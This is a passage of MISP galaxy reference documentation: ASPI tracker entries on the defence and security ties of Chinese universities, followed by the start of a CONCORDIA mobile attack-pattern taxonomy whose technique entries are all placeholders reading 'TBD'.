STDU specializes in transportation science, engineering and information technology. Its predecessor was the PLA Railway Engineering College.Since 2013, STDU has also been supervised by defence industry agency SASTIND through an arrangement designed to expand the university’s involvement in defense-related research and training. STDU has secret-level security credentials, allowing it to participate in classified defense technology research.STDU is home to the National Defense Transportation Research Institute (国防交通研究所), which is the only civilian university research institute that specializes in national defense transportation research. STDU is also home to the Institute of Complex Networks and Visualisations (复杂网络与可视化研究所), which develops military-use information processing software including remote-control systems for aerospace applications.

The tag is: misp-galaxy:china-defence-universities="Shijiazhuang Tiedao University (石家庄铁道大学)"

Table 688. Table References
Links
https://unitracker.aspi.org.au/universities/shijiazhuang-tiedao-university

Sichuan University (四川大学)

Sichuan University (SCU) is a leading Chinese university subordinate to the Ministry of Education. In 2011 and again in 2016 SCU was the subject of joint construction agreements between the MOE and defence industry agency SASTIND designed to increase its involvement in defence research.The university hosts at least three laboratories that focus on defence research and has a close relationship with the Chinese Academy of Engineering Physics (CAEP), the PRC’s primary nuclear warheads research facility. SCU’s Institute of Atomic and Molecular Physics and CAEP jointly established the Institute of Atomic and Molecular Engineering and the Institute of High Temperature and High Pressure Physics. In 2012, SCU was added to the US BIS Entity List as an alias of CAEP, implying that it acts as a proxy for the facility.A 2011 study by American think tank Project 2049 concluded that a PLA signals intelligence unit ‘likely maintain a close, mutually supportive relationship with related organizations in Chengdu, such as Sichuan University’s Information Security and Network Attack and Defense Laboratory (四川大学信息安全及网络攻防研究室).’

The tag is: misp-galaxy:china-defence-universities="Sichuan University (四川大学)"

Table 689. Table References
Links
https://unitracker.aspi.org.au/universities/sichuan-university

Soochow University (苏州大学)

Soochow University has been jointly supervised by the Jiangsu Provincial Government and defence industry agency SASTIND since 2016. This arrangement is designed to expand the university’s involvement in defense-related research and training.The university has five designated defence disciplines, centred around research on radiation. In particular, its School of Radiation Medicine and Protection has strong defence links, as it has become a major teaching and research base for the nuclear industry.Suzhou University is also involved in promoting military-civil fusion. The university cooperated with Changfeng Science Technology Industry Group (a subsidiary of missile manufacturer CASC) and Suzhou Xinkuan Electronic Technology Co., Ltd. to jointly establish the ‘Suzhou University Military-Civil Fusion Internet of Things Collaborative Innovation Center.’

The tag is: misp-galaxy:china-defence-universities="Soochow University (苏州大学)"

Table 690. Table References
Links
https://unitracker.aspi.org.au/universities/soochow-university

South China University of Technology (华南理工大学)

SCUT is subordinate to the Ministry of Education and in 2018 was placed under a joint-construction agreement between the MOE and SASTIND. This arrangement is designed to develop the university’s involvement in defence-related research and training. SCUT also holds secret-level security credentials, allowing it to participate in research and production for classified weapons and defence technology projects. As a result of the university’s placement under joint construction and its secret-level security credentials, SCUT’s involvement in defence research is likely to grow in coming years.Since 2008, the university has hosted a defence research laboratory on materials science. The lab was initially run by the university’s president. In 2017, the university joined the Guangzhou Civil-Military Integration Industry Coalition. More recently in 2019, SCUT and iFlytek established an artificial intelligence company, Guangzhou Huanan Naokong Zhineng Keji Gongsi (广州华南脑控智能科技公司).

The tag is: misp-galaxy:china-defence-universities="South China University of Technology (华南理工大学)"

Table 691. Table References
Links
https://unitracker.aspi.org.au/universities/south-china-university-of-technology

Southeast University (东南大学)

SEU is a leading Chinese university that engages in high levels of defence research. In 2015, the university undertook RMB180m (AUD37m) of defence research projects, placing it among the Ministry of Education universities most involved in defence research. That figure has almost certainly grown since 2016, when SEU came under a ‘joint construction’ agreement between the Ministry of Education and defence industry agency SASTIND. The university has secret security credentials, enabling it to participate in secret defence projects.The university has also been linked to cyberespionage. Researchers at its School of Cyber Science and Engineering (网络空间安全学院) have been funded by the MSS, China’s civilian intelligence agency. The School of Cyber Science and Engineering has close ties to TopSec, a Chinese information security company that trains, recruits and works with PLA cyber security officers.SEU states that its defence research relies on its excellence in electronics. It has at least two laboratories that specialise in defence research on navigation technology and underwater acoustics. Both laboratories may be involved in developing technology for underwater warfare. Representatives from the PLA Navy’s Submarine Academy visited SEU in 2017.SEU has also built relationships with state-owned defence conglomerates. In 2017, the university signed a strategic cooperation agreement with missile-manufacturer China Aerospace Science and Industry Corporation. In 2018 and 2019, it signed similar agreements with subsidiaries of China Electronics Technology Group Corporation, China’s leading manufacturer of military electronics.

The tag is: misp-galaxy:china-defence-universities="Southeast University (东南大学)"

Table 692. Table References
Links
https://unitracker.aspi.org.au/universities/southeast-university

Southwest University of Science and Technology (西南科技大学)

SWUST is deeply engaged in defence research and is based in Mianyang, a city also home to China’s nuclear weapons program and many other parts of the defence industry. Since 2006, the university has been subject to several joint construction agreements between the Sichuan Provincial Government and SASTIND that are designed to increase its involvement in defence research.SWUST carries out defence-related research on nuclear waste, radiation protection and electronic information engineering. It holds secret-level security credentials, allowing it to undertake classified defence technology and weapons projects. The university’s main defence laboratory carries out research on topics such as the use of microorganisms to clean nuclear waste.SWUST has worked closely with the Chinese Academy of Engineering Physics (China’s nuclear warheads program), China Aerodynamics Research and Development Center (a PLA base specialising in aircraft design), and defence conglomerates since its establishment. The fact that the university hosts the province’s ‘Civil-military Integration Institute’ is a testament to its integration with the military and defence industry.

The tag is: misp-galaxy:china-defence-universities="Southwest University of Science and Technology (西南科技大学)"

Table 693. Table References
Links
https://unitracker.aspi.org.au/universities/southwest-university-of-science-and-technology

Space Engineering University (中国人民解放军战略支援部队航天工程大学)

SEU was established in June 2017 as an expansion of the former PLA Equipment Academy (装备学院). SEU describes itself as a ‘comprehensive university that trains talents for space command management and engineering.’ It is intended to serve as the ‘cradle of the new PLA’s space talent training.’ The SEU is subordinate to and supports the PLA Strategic Support Force’s Space Systems Department (航天系统部), which has taken over the space and potentially counterspace capabilities that were previously the purview of the former General Armaments Department and, to a lesser degree, the former General Staff Department.The SEU offers degree programs at the undergraduate, master’s, and doctoral levels, as well as programs for non-commissioned officers, across disciplines including space target surveillance, remote sensing science and technology, and aerospace information security. Its faculty include nine CMC Science and Technology Commission experts and twenty professors who are designated as expert defence science and technology advisors.Beyond its mission of talent cultivation, the SEU also engages in extensive research. In particular, the SEU has a total of eighteen laboratories, which include two national-level key laboratories and one military-level key laboratory.

The tag is: misp-galaxy:china-defence-universities="Space Engineering University (中国人民解放军战略支援部队航天工程大学)"

Table 694. Table References
Links
https://unitracker.aspi.org.au/universities/space-engineering-university

Special Police Academy (中国武装警察部队特种警察学院)

SPA is made up of departments for training, political work and logistics. As such, SPA engages in little defence research and focusses its activities on training special operations paramilitary troops in command processes.

The tag is: misp-galaxy:china-defence-universities="Special Police Academy (中国武装警察部队特种警察学院)"

Table 695. Table References
Links
https://unitracker.aspi.org.au/universities/special-police-academy

Sun Yat-sen University (中山大学)

SYSU is a leading Chinese university subordinate to the Ministry of Education. In 2018, it come under the joint supervision of MOE and defence industry agency SASTIND. This development indicates that SYSU’s involvement in the defence industry and defence research is growing.The university has a large defence research budget. In 2018, it spent nearly RMB200 million (AUD41 million) on defence research out of its total research budget of RMB3.1 billion (AUD640 million).SYSU is linked to the Chinese military through its National Supercomputer Center in Guangzhou (国家超级计算广州中心), which was placed on the US Government Entity List in 2015 for its role in nuclear weapons development. The centre was jointly established with the PLA National University of Defense Technology in 2011 to host the Tianhe-2 supercomputer. The supercomputer is operated by the National University of Defense Technology and was the world’s fastest from 2013 to 2015.Aside from the supercomputer center, SYSU’s Key Laboratory of Information Science is the only known lab focused on defence research and is located within the School of Electronics and Information Technology.In 2010, the university established a State Secrets Academy (国家保密学院), serving as the third university in China to establish such an institute in partnership with China’s National Administration of State Secrets Protection (国家保密局). The Institute carries out research and training on the protection of state secrets.

The tag is: misp-galaxy:china-defence-universities="Sun Yat-sen University (中山大学)"

Table 696. Table References
Links
https://unitracker.aspi.org.au/universities/sun-yat-sen-university

Tianjin Polytechnic University (天津工业大学)

TJPU is known for its research in the field of textile science and engineering. It is jointly supervised by the Ministry of Education and the city of Tianjin. In 2018, defence industry agency SASTIND and the Tianjin Municipal Government signed an agreement to jointly support TJPU. The purpose of the agreement is to support the university’s development of defence disciplines, construction of defence laboratories, and training of defence scientists. Through this arrangement, SASTIND involves universities in military research projects and supports collaboration between universities and the defence industry. The university also holds secret-level security credentials that allow it to participate in classified defence technology projects.Tianjin Polytechnic University hosts one state key lab and two MOE key labs. One of the MOE key labs and the state key lab are located within the School of Material Science and Engineering. Additionally, TJPU’s School of Textile Science and Engineering has conducted R&D that has been applied to industries in aerospace, defense, transportation, civil engineering, among others. The School of Textile Science and Engineering has reportedly become a backbone of research and innovation for China’s textile industry.

The tag is: misp-galaxy:china-defence-universities="Tianjin Polytechnic University (天津工业大学)"

Table 697. Table References
Links
https://unitracker.aspi.org.au/universities/tianjin-polytechnic-university

Tianjin University (天津大学)

TJU is under the administration of the Ministry of Education and has also been supervised by defence industry agency SASTIND since 2012. The university has second-class security credentials, allowing it to participate in classified research projects at the level of ‘secret’. It hosts two defence laboratories, working on optoelectronics and propellants.In 2015, A professor at Tianjin University was arrested by U.S. federal agents and accused of economic espionage and technology theft. He had been a professor in the School of Precision Instrument and Opto-electronics Engineering, which is home to one of the MOE labs involved in defense research. TJU is also a member of several international engineering alliances and has one National Defense Technology Innovation Team.TJU carries out research for the Ministry of State Security (MSS), China’s civilian intelligence agency. It has hosted at least one MSS researcher and its scientists have been awarded for their work for the MSS on communication and information engineering.

The tag is: misp-galaxy:china-defence-universities="Tianjin University (天津大学)"

Table 698. Table References
Links
https://unitracker.aspi.org.au/universities/tianjin-university

Tongji University (同济大学)

Tongji University recognized for its work in architecture, civil engineering, marine geology, and transportation engineering. The university established the only state key laboratory of deep-sea geology, which plays an important role in China’s deep-sea observation and serves as a significant platform for the country’s marine strategy.The university’s involvement in marine research likely stems from its joint construction with the State Oceanic Administration (SOA). In 2010, the Ministry of Education and the State Oceanic Administration signed to jointly establish 17 universities, a collaboration aimed at enhancing the ability to cultivate marine talents in universities, develop marine science and technology, and make contributions to the development of China’s marine industry.Tongji University has secret-level security credentials and is home to one Ministry of Education laboratory dedicated to defense research. In April 2019, the university was placed on the U.S. Unverified List, which places restrictions on US exports to the university. Entities are added the Unverified List if the US Government is unable to satisfactorily carry out end-user checks on them to ensure compliance with export licenses.

The tag is: misp-galaxy:china-defence-universities="Tongji University (同济大学)"

Table 699. Table References
Links
https://unitracker.aspi.org.au/universities/tongji-university

Tsinghua University (清华大学)

Tsinghua University is considered China’s leading university in science and technology. Often characterized as ‘China’s MIT,’ Tsinghua is highly ranked globally, while also being the alma mater of numerous Chinese leaders, including Xi Jinping. Tsinghua has been included in numerous Chinese educational initiatives, including acting as a Class A institution in the Double First-Class University Plan and with membership in China’s C9 League. As of spring 2018, Tsinghua University had 390 research institutions operating across a range of fields.Tsinghua engages in a range of military research and was awarded secret-level security credentials for classified research in 2007. In advancing military-civil fusion, Tsinghua also continues its ‘fine tradition’ of serving China’s national security and defense, actively creating new platforms and initiatives to support this strategy. Not only its dedicated defence laboratories but also a range of key laboratories and research institutions at the university have received funding from the military. Since at least 2012, Tsinghua has also been jointly supervised by defence industry agency SASTIND as part of a program to deepen its defence research and links to the defence sector.Tsinghua’s defence research covers areas such as artificial intelligence, air-to-air missiles, navigation technology, instrument science and materials science.The university trains students for China’s nuclear weapons program, military and defence industry. In 2014 it signed a strategic cooperation agreement with the Chinese Academy of Engineering Physics (CAEP)—China’s nuclear weapons program. In 2016, CAEP’s Materials Institute and Tsinghua established a joint postgraduate training base for teaching, research collaboration and equipment sharing.Approximately 200 postgraduate students at Tsinghua are sponsored by CAEP or defence industry conglomerates each year through the Chinese government’s National Defence Science and Technology Scholarship program. Scholarship recipients are required to work for their sponsoring organisation for five years after graduating. Roughly 2000 of the scholarships are awarded each year, indicating that Tsinghua students are among the primary recipients of them. Documents published by Tsinghua indicate that CAEP planned to sponsor 40 PhD students to study nuclear technology in 2013. CAEP continues to sponsor Tsinghua postgraduates. In 2004, Tsinghua agreed to supervise doctoral students from the PLA’s Second Artillery Engineering University, now known as the Rocket Force University of Engineering.

The tag is: misp-galaxy:china-defence-universities="Tsinghua University (清华大学)"

Table 700. Table References
Links
https://unitracker.aspi.org.au/universities/tsinghua-university

University of Electronic Science and Technology of China (电子科技大学)

UESTC was established in 1961 as one of China’s first defence industry universities. It is now subordinate to the Ministry of Education (MOE) and is also jointly supervised by defence industry agencies MIIT and SASTIND, as well as the Chinese military’s leading electronics manufacturer, China Electronics Technology Group Corporation (CETC).The university is one of China’s leading universities for defence electronics research. It claims to rank among the top MOE universities in terms of the scale of its defence research. Between 2011 and 2015, its annual spending on defence research grew by 210% to RMB400 million (AUD80 million) and may account for as much as 32% of its overall research spending. 16.43% of UESTC graduates in 2017 who found employment were working in the defence sector. UESTC gained secret-level security credentials about a decade ago, probably in 2006, making it one of the first MOE universities to hold them.UESTC research has been used by state-owned manufacturers of military aircraft, missiles, and military electronics and the PLA Navy on projects such as the JF-17 fighter and the Navy’s aircraft carrier program.UESTC’s defence research covers areas including electronics, microwaves, terahertz technology, anti-jamming technology and signal processing, communication systems, military-use critical materials, optoelectric imaging. Between 2001 and 2005, UESTC undertook over 900 military electronics projects worth in excess of RMB500 million (AUD104 million).UESTC’s research on artificial intelligence has attracted scrutiny for its human rights implications. In 2015, a professor recruited by UESTC through the Thousand Talents Plan established a company called Koala AI. The company produces artificial intelligence surveillance systems that are used in Xinjiang, where an estimated 1.5 million Uyghurs and other ethnic minorities have disappeared into concentration camps.UESTC has close relationships with the Chinese defence industry. The university operates a national laboratory on high-power radiation with the Chinese Academy of Engineering Physics, the PRC’s primary nuclear warhead research complex. CETC, a state-owned defence conglomerate, partnered jointly with the MOE to developUESTC’s capabilities. Under the arrangement, UESTC agreed to expand its collaboration with CETC, help train CETC personnel and send its best students to work at CETC. Defence industry agency SASTIND also signed agreements to supervise UESTC in 2008 and 2016.

The tag is: misp-galaxy:china-defence-universities="University of Electronic Science and Technology of China (电子科技大学)"

Table 701. Table References
Links
https://unitracker.aspi.org.au/universities/university-of-electronic-science-and-technology-of-china

University of International Relations (国际关系学院)

UIR claims was established in 1949 under the direction of then Premier Zhou Enlai. In 1964 it was designated as a ‘national key university’, and this appears to be the evidence it uses to claim it is a Ministry of Education university. However, the university does not appear on the Ministry of Education’s list of subordinate universities.Individuals formerly and presently affiliated with the university have also held affiliations with the MSS or the MSS-linked think tank the China Institutes of Contemporary International Relations (中国现代国际关系研究院). They include Geng Huichang (耿惠昌), a former Minister of State Security (2007-2016) and vice minister of State Security (1998-2007). Prior to this he was the head of China Institutes of Contemporary International Relations from 1992 to 1998. From 1990 to 1992, he was the director of UIR’s American Research Department and from 1985-1990 he was deputy director of the American Research department. Notably, current UIR President Tao Jian is also a former CICIR vice-president and a UIR graduate.UIR gives the MSS a way to work with foreign universities and academics to shape and learn about perceptions of the PRC’s views on security. It also provides a platform for the MSS to identify talent, recruit officers and collect intelligence.The university’s Hangzhou campus, also known as the Zhejiang Second People’s Police School, may carry out more practical training of MSS officers and has been described on a local government website as ‘specialising in training special talent’. Some graduates of the Hangzhou campus have moved straight into MSS positions. The Hangzhou campus works closely with Zhejiang University on teaching and research.

The tag is: misp-galaxy:china-defence-universities="University of International Relations (国际关系学院)"

Table 702. Table References
Links
https://unitracker.aspi.org.au/universities/university-of-international-relations

University of Science and Technology Beijing (北京科技大学)

USTC is a leading university subordinate to the MOE. The university engages in high levels of defence research and claims be among the top MOE universities for defence spending. Since 2018, it has been under a joint-construction agreement between the MOE and defence industry agency SASTIND that is designed to expand its involvement in defence research.USTB is known as the ‘cradle of steel’ for its training and research on metallurgy. The university’s defence research appears to focus on metallurgy and materials science. It hosts at least three laboratories dedicated to defence research, including two that are jointly run with state-owned defence conglomerates. The head of USTB’s Institute of Advanced Materials and Technology also heads a SASTIND-supported defence science and technology innovation team.The university holds secret-level security credentials, allowing it participate in research and production for classified weapons and defence technology projects.

The tag is: misp-galaxy:china-defence-universities="University of Science and Technology Beijing (北京科技大学)"

Table 703. Table References
Links
https://unitracker.aspi.org.au/universities/university-of-science-and-technology-beijing

University of Science and Technology of China (中国科学技术大学)

The University of Science and Technology of China is among China’s most prestigious universities in science and technology. Uniquely, it was established and is supervised by the Chinese Academy of Sciences, intended to serve national objectives in science and technology. Xi Jinping personally inspected USTC in 2016, urging it to pursue “even more outstanding achievements in teaching and innovation.” It is a member of the C9 League and in the “211 Project” and “985 Project.” While providing undergraduate and graduate-level education, USTC is also highly active in research across a number of major laboratories, including several that support research that is related to national defense and the development of dual-use technologies, such as brain-inspired approaches to artificial intelligence and quantum information science. USTC has a long history of contributions to science in the service of the state, and it has recently sought to deepen its contributions to military research, including through establishing a new center for military-civil fusion. Several USTC professors, including prominently Pan Jianwei, have partnered with the defense industry to pursue military applications of their technologies.

The tag is: misp-galaxy:china-defence-universities="University of Science and Technology of China (中国科学技术大学)"

Table 704. Table References
Links
https://unitracker.aspi.org.au/universities/university-of-science-and-technology-of-china

University of Shanghai for Science and Technology (上海理工大学)

USST describes itself as a ‘university with defence characteristics’. It has been under the joint supervision of Shanghai and defence industry agency SASTIND since 2016.It is engaged in growing levels of defence research and holds second-class weapons research and development secrecy credentials, allowing it to undertake classified projects. In 2017, its spending on defence research reached RMB13 million (AUD2.6 million).SASTIND has designated areas with the fields of optics, energy and control science as defence disciplines at USST, indicating that the university’s defence research focuses on these areas.In 2017, The university established a joint venture on terahertz radiation technology with subsidiaries of defence conglomerate Norinco Group.

The tag is: misp-galaxy:china-defence-universities="University of Shanghai for Science and Technology (上海理工大学)"

Table 705. Table References
Links
https://unitracker.aspi.org.au/universities/university-of-shanghai-for-science-and-technology

University of South China (南华大学)

USC specialises in nuclear engineering. It has a well-developed defence research program and has been the subject of several joint-construction agreements between the Hunan Provincial Government and defence industry agency SASTIND since 2002. These agreements are designed to ‘support USC in going a step further to display its defence characteristics based on the development needs of the defence technology industry.’ USC is also supervised by China National Nuclear Corporation, a state-owned defence nuclear engineering conglomerate.USC carries out large amounts of defence research related to nuclear engineering, as well as work on information technology, communications engineering, control engineering and electrical engineering. The university received secret level security credentials in 2008, allowing it to work on classified defence projects.

The tag is: misp-galaxy:china-defence-universities="University of South China (南华大学)"

Table 706. Table References
Links
https://unitracker.aspi.org.au/universities/university-of-south-china

Wuhan University (武汉大学)

WHU is a leading Chinese university subordinate to the Ministry of Education. The university has close ties to the military and has been subject to a joint-supervision agreement between the Ministry of Education and defence industry agency SASTIND since 2016, an arrangement designed to increase its involvement in defence research. In 2015, WHU planned to spend RMB200 million (AUD42 million) on defence research for the year and described itself as ‘a university with a strong reputation in the defence science and technology field’.WHU carries out defence research in a wide range of fields, including navigation, computer simulation, electronic information, electromagnetics, aerospace remote sensing, materials science, cyber security and explosions. The university is an important site of research for China’s Beidou satellite navigation system.Aside from being involved in defence research, there are strong indications that WHU has carried out cyber attacks for the People’s Liberation Army. One of the university’s two defence laboratories purportedly established by the Ministry of Education, the Key Laboratory of Aerospace Information Security and Trusted Computing, has been accused by unnamed US and Taiwanese officials of carrying out cyberattacks.

The tag is: misp-galaxy:china-defence-universities="Wuhan University (武汉大学)"

Table 707. Table References
Links
https://unitracker.aspi.org.au/universities/wuhan-university

Wuhan University of Technology (武汉理工大学)

WHUT is subordinate to the Ministry of Education. The university originally specialised in research relating to construction, transport and automobiles. It engages in high levels of defence research and has been under a ‘joint-construction’ agreement between the Ministry of Education and defence industry agency SASTIND since 2016. It holds secret-level security credentials.The university hosts two Ministry of Education laboratories dedicated to defence research on materials science and ship technology. WHUT also works closely with the PLA Air Force on defensive engineering such as the construction of aircraft bunkers and underground shelters. Since 2001, WHUT and the Guangdong Military Region Air Force Engineering and Construction Bureau have run a joint research institute, which ‘takes advantage of [WHUT’s] State Key Laboratory of Advanced Technology for Materials Synthesis and Processing’. ‘In 2012, the PLA Air Force Logistics Department and WHUT held a signing ceremony inaugurating the “Air Force-level Military-Civil Fusion Air Defence Engineering Construction Technology Innovation Platform Cooperation Agreement” (空军级军民融合式空防工程建设科技创新平台合作协议)’. The same department in cooperation with WHUT also jointly established the Air Force Air Defence Engineering Construction Technology Innovation Platform (空军级空防工程建设科技创新平台), with ‘the goal of innovating mutually beneficial technologies.’

The tag is: misp-galaxy:china-defence-universities="Wuhan University of Technology (武汉理工大学)"

Table 708. Table References
Links
https://unitracker.aspi.org.au/universities/wuhan-university-of-technology

Xi’an Jiaotong University (西安交通大学)

XJTU is subordinate to the Ministry of Education. It is also supervised by SASTIND as part of a program to develop defense research capabilities within Chinese universities. The university describes its strategy as being ‘based in Shaanxi, geared toward the needs of the nation, and serving the national defense industry.’The university is advanced in its implementation of military-civil fusion and has established strategic partnerships with China Aerospace Science and Technology Corporation, China Aerospace Science and Industry Corporation, and the Aero Engine Corporation of China. It holds secret-level security credentials, allowing it to participate in classified defence technology projects.

The tag is: misp-galaxy:china-defence-universities="Xi’an Jiaotong University (西安交通大学)"

Table 709. Table References
Links
https://unitracker.aspi.org.au/universities/xian-jiaotong-university

Xi’an Technological University (西安工业大学)

XATU is a civilian university that primarily engages in defence research. XATU describes itself as ‘having distinct defence-industrial characteristics’ and is heavily involved in weapons development. Since 2016, it has been subject to a ‘joint construction’ agreement between the Shaanxi Provincial Government and defence industry agency SASTIND designed to deepen its defence links.The university’s main areas of defence research include photoelectric imaging technology, manufacturing technology, materials science, detection and measurement technology and weapons systems. It holds secret-level security credentials.XATU is a member of the B8 Cooperation Innovation Alliance (B8协同创新联盟 or 中国兵器协同创新联盟), a group of eight Chinese research institutions that specialize in weapons science—the ‘B’ in ‘B8’ stands for Chinese work for armaments, bingqi (兵器). Apart from Shenyang Ligong University, XATU is the only Chinese civilian university known to be supervised by state-owned arms manufacturers China North Industries Group (Norinco Group) and China South Industries Group.

The tag is: misp-galaxy:china-defence-universities="Xi’an Technological University (西安工业大学)"

Table 710. Table References
Links
https://unitracker.aspi.org.au/universities/xian-technological-university

Xi’an University of Posts and Telecommunications (西安邮电大学)

XUPT is a leading Chinese university supervised by the Shaanxi Provincial Government and the Department of Information Technology. The university was established in 1959 as an institution focused on communications and information technology. XUPT retains a focus on these discipline to this day. XUPT’s faculties include college focusing on artificial intelligence, automation, cyber security and electrical engineering.XUPT maintains close links to China’s Ministry of Public Security (MPS). The university has signed agreements and established joint laboratories with the MPS’s local counterparts.In November 2013, XUPT partnered with the Shaanxi Municipal Government’s public security ministry to establish the MPS Key Laboratory of Electronic Information Application Technology for Scene Investigation (公安部电子信息现场勘验应用技术重点实验室). This was the first such joint laboratory that the MPS established with a university in any of China’s five north-western provinces.XUPT partnered with Xi’an’s Yanta District Public Security Bureau branch in November 2018, establishing the ‘Joint Laboratory for Smart Public Security Information Analysis and Applications’ (公安信息智能分析及应用联合实验室). The joint laboratory develops applications of artificial intelligence for analysing criminal information.

The tag is: misp-galaxy:china-defence-universities="Xi’an University of Posts and Telecommunications (西安邮电大学)"

Table 711. Table References
Links
https://unitracker.aspi.org.au/universities/xian-university-of-posts-and-telecommunications

Xiamen University (厦门大学)

XMU is one of China’s leading universities, but it does not appear to engage in high levels of defence research. However, in 2018 it came under a joint supevision agreement between the Ministry of Education, the Fujian Provincial Government and defence industry agency SASTIND that indicates XMU will expand its involvement in defence research. The arrangement is designed to ‘upgrade the university’s ability to innovate defence science and technology and actively integrate itself with the development of military-civil fusion.’In 2017, XMU allegedly conspired with Huawei to steal trade secrets from CNEX Labs Inc., an American semiconductor startup. CNEX claims that Huawei and XMU engaged in a multiyear conspiracy to steal the company’s solid-state drive computer storage technology.The university appears to be involved in the development of military-use heavy-duty coatings. In 2017, XMU, Fujian Normal University, Fujian Liheng Paint Co. Ltd. (福建立恒涂料有限公司) and People’s Liberation Army Unit 63983 jointly established the Haixi Liheng New Materials Research Institute (海西立恒新材料研究院). Fujian Liheng Paint specialises in heavy-duty coatings for warships and holds confidential-level security credentials, allowing it to participate in classified defence projects.

The tag is: misp-galaxy:china-defence-universities="Xiamen University (厦门大学)"

Table 712. Table References
Links
https://unitracker.aspi.org.au/universities/xiamen-university

Xiangtan University (湘潭大学)

XTU is a university in Chairman Mao Zedong’s hometown that has substantially expanded its participation in defence research in recent years. It has been subject to two ‘joint construction’ agreements between the Hunan Provincial Government and defence industry agency SASTIND that are designed to help the university ‘draw out its national defence characteristics’. In the university’s own words, its ‘military-civil fusion characteristics are becoming clearer with each day’, and it increased its spending on military-related projects by 60% from 2017 to 2018, spending over RMB31 million (AUD6 million) in 2018.XTU’s defence research covers areas including materials science, energy, measurement technology and electromagnetic waves. The university has developed partnerships with a major PLA nuclear technology research institution, Northwest Institute of Nuclear Technology, and several defence companies, including subsidiaries of arms manufacturer Norinco Group and defence aviation conglomerate Aero Engine Corporation of China.XTU holds secret-level security credentials, allowing it to participate in classified defence technology projects.

The tag is: misp-galaxy:china-defence-universities="Xiangtan University (湘潭大学)"

Table 713. Table References
Links
https://unitracker.aspi.org.au/universities/xiangtan-university

Xidian University (西安电子科技大学)

Xidian Univeristy is among China’s top universities for research on antennas, radar, electronic countermeasures and computer science. The university is subordinate to the Ministry of Education and is also jointly supervised by defence industry agency SASTIND and defence electronics conglomerate CETC. It claims it has ‘made important contributions to military modernisation’.The university is closely tied to China’s defense industry and the PLA. It runs at least five defence laboratories and partners with the PLA’s signals intelligence organization. Xidian appears to be an important training ground for Chinese military hackers. According to Xidian’s party secretary, the university has had an ‘unbreakable bond with secret intelligence work since its beginning’. It also holds secret-level security credentials that allow it to work on classified weapons projects.

The tag is: misp-galaxy:china-defence-universities="Xidian University (西安电子科技大学)"

Table 714. Table References
Links
https://unitracker.aspi.org.au/universities/xidian-university

Yanshan University (燕山大学)

The university was formed as an offshoot of Harbin Institute of Technology, one of China’s top defence universities, in 1960. The university continues to prioritise defence research and is jointly supervised by the Hebei Provincial Government together with the Ministry of Education, Ministry of Industry and Information Technology and defence industry agency SASTIND.YSU’s Defense Science and Technology Institute was established in 2006 under the support of COSTIND (a defence industry agency that has been replaced by SASTIND) to expand and oversee defence research at the university. The institute has driven the university’s involvement in space-related defence research through the establishment of laboratories such as the Key Laboratory of Fundamental Science of Mechanical Structure and Materials Science Under Extreme Conditions. Four fields of research at YSU are officially designated as defence disciplines: control theory and control science, electrical circuits and systems, mechanical design and theory, and materials science and engineering.The university holds secret-level security credentials.

The tag is: misp-galaxy:china-defence-universities="Yanshan University (燕山大学)"

Table 715. Table References
Links
https://unitracker.aspi.org.au/universities/yanshan-university

Yunnan Normal University (云南师范大学)

YNNU is a Chinese university subordinate to the Yunnan Provincial Government. Since 2013 it has also been supervised by the Ministry of Education. The university has been focused on training teacher since its inception as the Kunming Teachers College (昆明示范学院) in 1950. YNNU now has a broader focus on a variety of humanities, social and natural science disciplines.YNNU is organised into numerous faculties, some of which are relevant for communist party cadre training:

The tag is: misp-galaxy:china-defence-universities="Yunnan Normal University (云南师范大学)"

Table 716. Table References
Links
https://unitracker.aspi.org.au/universities/yunnan-normal-university

Zhejiang University (浙江大学)

ZJU is subordinate to the Ministry of Education and jointly constructed with defence industry agency SASTIND. This arrangement with SASTIND began in 2016 and is designed to deepend the university’s involvement in defence research. The university holds secret-level security credentials, allowing it to work on classified military projects.The university’s total research funding amounts to RMB4.56 billion (AUD940 million) in 2018. It has at least three defence laboratories, with one source claiming that the university had ten key national laboratories (国家重点实验室) as of 2015. These laboratories are involved in research on computer simulations, high-performance computing and control science. The university also carries out cyber security research and receives funding for this work from the MSS, China’s civilian intelligence agency.ZJU cooperates extensively with international universities and companies, with upwards of 40 international joint S&T research labs. The College of Electrical Engineering has joint labs with U.S. companies in key industries, such as Rockwell Automation in the field of information technology, and the National Semiconductor Corporation. Additionally, the university has a joint research lab with U.S company Microsoft.

The tag is: misp-galaxy:china-defence-universities="Zhejiang University (浙江大学)"

Table 717. Table References
Links
https://unitracker.aspi.org.au/universities/zhejiang-university

CONCORDIA Mobile Modelling Framework - Attack Pattern

A list of Techniques in CONCORDIA Mobile Modelling Framework..

CONCORDIA Mobile Modelling Framework - Attack Pattern is a cluster galaxy available in JSON format at this location The JSON format can be freely reused in your application or automatically enabled in MISP.

authors: Bernardo Santos, OsloMet (Norway) - Prof. Dr. Thanh van Do, Telenor Research (Norway) - Luis Barriga, Ericsson AB (Sweden) - Prof. Boning Feng, OsloMet (Norway) - Van Thuan Do, Wolffia AS (Norway) - Bruno Dzogovic, OsloMet (Norway) - Niels Jacot, Wolffia AS (Norway)

Active Scanning

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Active Scanning"

Gather UE Identity Information

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Gather UE Identity Information"

Gather UE Network Information

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Gather UE Network Information"

Phishing for Information

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Phishing for Information"

Social Media Reports

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Social Media Reports"

Develop Capabilities

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Develop Capabilities"

Obtain Capabilities

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Obtain Capabilities"

Stage Capabilities

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Stage Capabilities"

Compromise Accounts

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Compromise Accounts"

Acquire Infrastructure

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Acquire Infrastructure"

Compromise Infrastructure

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Compromise Infrastructure"

Exploit Public-Facing Application

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Exploit Public-Facing Application"

Malicious App from App Store

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Malicious App from App Store"

Malicious App from Third Party

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Malicious App from Third Party"

Masquerade as Legitimate Application

TBD

The tag is: misp-galaxy:cmtmf-attack-pattern="Masquerade as Legitimate Application"

Exploit via Charging Station or PC

TBD

